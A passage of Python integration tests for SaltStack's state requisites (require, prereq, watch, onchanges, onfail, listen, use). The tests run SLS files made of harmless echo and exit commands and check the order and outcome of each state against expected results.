])
def test_requisites_mixed_require_prereq_use(self):
'''
Call sls file containing several requisites.
'''
expected_simple_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True}
}
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B third" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True}
}
expected_req_use_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 4,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 5,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 2,
'comment': 'Command "echo E" run',
'result': True,
'changes': True},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 3,
'comment': 'Command "echo F" run',
'result': True,
'changes': True}
}
ret = self.run_function('state.sls', mods='requisites.mixed_simple')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_simple_result, result)
# test Traceback recursion prereq+require #8785
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error2')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v2
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error3')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v3
# TODO: this is actually failing badly, and expected result is maybe not a recursion
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error4')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
        # an undetected infinite loop prevents this test from running...
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.mixed_complex1')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result, result)
def test_watch_in(self):
'''
test watch_in requisite when there is a success
'''
ret = self.run_function('state.sls', mods='requisites.watch_in')
changes = 'test_|-return_changes_|-return_changes_|-succeed_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(ret[changes]['__run_num__'], 0)
self.assertEqual(ret[watch]['__run_num__'], 2)
self.assertEqual('Watch statement fired.', ret[watch]['comment'])
self.assertEqual('Something pretended to change',
ret[changes]['changes']['testing']['new'])
def test_watch_in_failure(self):
'''
test watch_in requisite when there is a failure
'''
ret = self.run_function('state.sls', mods='requisites.watch_in_failure')
fail = 'test_|-return_changes_|-return_changes_|-fail_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(False, ret[fail]['result'])
self.assertEqual('One or more requisite failed: requisites.watch_in_failure.return_changes',
ret[watch]['comment'])
def normalize_ret(self, ret):
'''
Normalize the return to the format that we'll use for result checking
'''
result = {}
for item, descr in six.iteritems(ret):
result[item] = {
'__run_num__': descr['__run_num__'],
'comment': descr['comment'],
'result': descr['result'],
                'changes': descr['changes'] != {}  # whether there were any changes
}
return result
def test_requisites_require_ordering_and_errors(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' foobar: A\n',
'result': False,
'changes': False,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 7,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
ret = self.run_function('state.sls', mods='requisites.require_error1')
self.assertEqual(ret, [
"Cannot extend ID 'W' in 'base:requisites.require_error1'. It is not part of the high state.\nThis is likely due to a missing include statement or an incorrectly typed ID.\nEnsure that a state with an ID of 'W' is available\nin environment 'base' and to SLS 'requisites.require_error1'"
])
# issue #8235
# FIXME: Why is require enforcing list syntax while require_in does not?
# And why preventing it?
# Currently this state fails, should return C/B/A
result = {}
ret = self.run_function('state.sls', mods='requisites.require_simple_nolist')
self.assertEqual(ret, [
'The require statement in state \'B\' in SLS '
+ '\'requisites.require_simple_nolist\' needs to be formed as a list'
])
# commented until a fix is made for issue #8772
# TODO: this test actually fails
#ret = self.run_function('state.sls', mods='requisites.require_error2')
#self.assertEqual(ret, [
# 'Cannot extend state foobar for ID A in "base:requisites.require_error2".'
# + ' It is not part of the high state.'
#])
ret = self.run_function('state.sls', mods='requisites.require_recursion_error1')
self.assertEqual(
ret,
['A recursive requisite was found, SLS "requisites.require_recursion_error1" ID "B" ID "A"']
)
def test_requisites_require_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-$(which false)_|-run': {
'__run_num__': 1,
'comment': 'Command "$(which false)" run',
'result': False,
'changes': True,
},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D" run',
'result': True,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.require_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_require_any_fail(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
ret = self.run_function('state.sls', mods='requisites.require_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-D_|-echo D_|-run']['comment'])
def test_requisites_watch_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
if salt.utils.platform.is_windows():
cmd_true = 'exit'
cmd_false = 'exit /B 1'
else:
cmd_true = 'true'
cmd_false = 'false'
expected_result = {
'cmd_|-A_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 4,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-B_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 0,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-C_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 1,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-D_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 2,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-E_|-{0}_|-wait'.format(cmd_true): {
'__run_num__': 9,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-F_|-{0}_|-run'.format(cmd_true): {
'__run_num__': 5,
'comment': 'Command "{0}" run'.format(cmd_true),
'result': True,
'changes': True,
},
'cmd_|-G_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 6,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
'cmd_|-H_|-{0}_|-run'.format(cmd_false): {
'__run_num__': 7,
'comment': 'Command "{0}" run'.format(cmd_false),
'result': False,
'changes': True,
},
}
ret = self.run_function('state.sls', mods='requisites.watch_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_watch_any_fail(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
ret = self.run_function('state.sls', mods='requisites.watch_any_fail')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertIn('One or more requisite failed',
result['cmd_|-A_|-true_|-wait']['comment'])
def test_requisites_onchanges_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-another_changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-changing_state_|-echo "Changed!"_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "echo "Changed!"" run',
'result': True
},
'cmd_|-test_one_changing_states_|-echo "Success!"_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "echo "Success!"" run',
'result': True
},
'cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run': {
'__run_num__': 5,
'changes': False,
'comment': 'State was not run because none of the onchanges reqs changed',
'result': True
},
'pip_|-another_non_changing_state_|-mock_|-installed': {
'__run_num__': 3,
'changes': False,
'comment': 'Python package mock was already installed\nAll specified packages are already installed',
'result': True
},
'pip_|-non_changing_state_|-mock_|-installed': {
'__run_num__': 2,
'changes': False,
'comment': 'Python package mock was already installed\nAll specified packages are already installed',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onchanges_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_onfail_any(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-a_|-exit 0_|-run': {
'__run_num__': 0,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-b_|-exit 1_|-run': {
'__run_num__': 1,
'changes': True,
'comment': 'Command "exit 1" run',
'result': False
},
'cmd_|-c_|-exit 0_|-run': {
'__run_num__': 2,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-d_|-echo itworked_|-run': {
'__run_num__': 3,
'changes': True,
'comment': 'Command "echo itworked" run',
'result': True},
'cmd_|-e_|-exit 0_|-run': {
'__run_num__': 4,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-f_|-exit 0_|-run': {
'__run_num__': 5,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-g_|-exit 0_|-run': {
'__run_num__': 6,
'changes': True,
'comment': 'Command "exit 0" run',
'result': True
},
'cmd_|-h_|-echo itworked_|-run': {
'__run_num__': 7,
'changes': False,
'comment': 'State was not run because onfail req did not change',
'result': True
}
}
ret = self.run_function('state.sls', mods='requisites.onfail_any')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_full_sls(self):
'''
        Test the sls special command in requisites
'''
expected_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.fullsls_require')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result, result)
# issue #8233: traceback on prereq sls
# TODO: not done
#ret = self.run_function('state.sls', mods='requisites.fullsls_prereq')
#self.assertEqual(['sls command can only be used with require requisite'], ret)
def test_requisites_require_no_state_module(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' id: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require_no_state_module')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
def test_requisites_prereq_simple_ordering_and_errors(self):
'''
Call sls file containing several prereq_in and prereq.
Ensure that some of them are failing and that the order is right.
'''
expected_result_simple = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False},
'cmd_|-J_|-echo J_|-run': {
'__run_num__': 4,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n',
'result': False,
'changes': False}
}
expected_result_simple_no_state_module = {
'cmd_|-A_|-echo A third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A third" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-I_|-echo I_|-run': {
'__run_num__': 3,
'comment': 'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' id: Z\n',
'result': False,
'changes': False}
}
expected_result_simple2 = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 3,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 4,
'comment': 'Command "echo E" run',
'result': True,
'changes': True}
}
expected_result_simple3 = {
'cmd_|-A_|-echo A first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo A first" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-wait': {
'__run_num__': 2,
'comment': '',
'result': True,
'changes': False,
}
}
expected_result_complex = {
'cmd_|-A_|-echo A fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A fourth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D third" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.prereq_simple')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple, result)
# same test, but not using lists in yaml syntax
# TODO: issue #8235, prereq ignored when not used in list syntax
# Currently fails badly with :
# TypeError encountered executing state.sls: string indices must be integers, not str.
#expected_result_simple.pop('cmd_|-I_|-echo I_|-run')
#expected_result_simple.pop('cmd_|-J_|-echo J_|-run')
#ret = self.run_function('state.sls', mods='requisites.prereq_simple_nolist')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result_simple, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple2')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple2, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple3')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple3, result)
#ret = self.run_function('state.sls', mods='requisites.prereq_error_nolist')
#self.assertEqual(
# ret,
# ['Cannot extend ID Z in "base:requisites.prereq_error_nolist".'
# + ' It is not part of the high state.']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error1')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error2')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: C\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_complex')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_complex, result)
# issue #8210 : prereq recursion undetected
# TODO: this test fails
#ret = self.run_function('state.sls', mods='requisites.prereq_recursion_error')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_recursion_error" ID "B" ID "A"']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_simple_no_state_module')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple_no_state_module, result)
def test_infinite_recursion_sls_prereq(self):
ret = self.run_function('state.sls', mods='requisites.prereq_sls_infinite_recursion')
self.assertSaltTrueReturn(ret)
def test_requisites_use(self):
'''
Call sls file containing several use_in and use.
'''
# TODO: issues #8235 & #8774: some examples are still commented out in the test file
ret = self.run_function('state.sls', mods='requisites.use')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
# TODO: issue #8802: use recursion undetected
# The issue is closed, as use does not actually inherit requisites.
# If chain-use is added after #8774 is resolved, these tests may become useful again.
#ret = self.run_function('state.sls', mods='requisites.use_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "B" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_recursion2')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion2"'
# + ' ID "C" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_auto_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "A" ID "A"'
#])
def test_requisites_use_no_state_module(self):
'''
Call sls file containing several use_in and use.
'''
ret = self.run_function('state.sls', mods='requisites.use_no_state_module')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
def test_get_file_from_env_in_top_match(self):
tgt = os.path.join(TMP, 'prod-cheese-file')
try:
ret = self.run_function(
'state.highstate', minion_tgt='sub_minion'
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(tgt))
with salt.utils.files.fopen(tgt, 'r') as cheese:
data = salt.utils.stringutils.to_unicode(cheese.read())
self.assertIn('Gromit', data)
self.assertIn('Comte', data)
finally:
if os.path.islink(tgt):
os.unlink(tgt)
# onchanges tests
def test_onchanges_requisite(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# First, test the result of the state run when changes are expected to happen
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_multiple(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls',
mods='requisites.onchanges_multiple')
# First, test the result of the state run when two changes are expected to happen
test_data = state_run['cmd_|-test_two_changing_states_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when two changes are not expected to happen
test_data = state_run['cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
# Finally, test the result of the state run when only one of the onchanges requisites changes.
test_data = state_run['cmd_|-test_one_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_in_requisite(self):
'''
Tests a simple state using the onchanges_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_in_simple')
# First, test the result of the state run when changes are expected to happen
test_data = state_run['cmd_|-test_changes_expected_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_changes_not_expected_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_no_state_module(self):
'''
Tests a simple state using the onchanges requisite without state modules
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple_no_state_module')
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_with_duration(self):
'''
Tests a simple state using the onchanges requisite.
The state will not run, but the results will include a duration.
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# Then, test the result of the state run when changes are not expected to happen
# and ensure duration is included in the results
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
# onfail tests
def test_onfail_requisite(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_multiple_onfail_requisite(self):
'''
test to ensure state is run even if only one
of the onfails fails. This is a test for the issue:
https://github.com/saltstack/salt/issues/22370
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple')
retcode = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['stdout']
self.assertEqual(stdout, 'itworked')
def test_onfail_in_requisite(self):
'''
Tests a simple state using the onfail_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_in_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_no_state_module(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple_no_state_module')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_with_duration(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
def test_multiple_onfail_requisite_with_required(self):
'''
test to ensure multiple states are run
when specified as onfails for a single state.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required')
retcode = state_run['cmd_|-b_|-echo b_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-c_|-echo c_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-d_|-echo d_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-b_|-echo b_|-run']['changes']['stdout']
self.assertEqual(stdout, 'b')
stdout = state_run['cmd_|-c_|-echo c_|-run']['changes']['stdout']
self.assertEqual(stdout, 'c')
stdout = state_run['cmd_|-d_|-echo d_|-run']['changes']['stdout']
self.assertEqual(stdout, 'd')
def test_multiple_onfail_requisite_with_required_no_run(self):
'''
test to ensure multiple states are not run
when specified as onfails for a single state
which fails.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required_no_run')
expected = 'State was not run because onfail req did not change'
stdout = state_run['cmd_|-b_|-echo b_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-c_|-echo c_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-d_|-echo d_|-run']['comment']
self.assertEqual(stdout, expected)
# listen tests
def test_listen_requisite(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite(self):
'''
Tests a simple state using the listen_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# Test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listen_in_resolution_|-echo "Successful listen_in resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_resolution(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
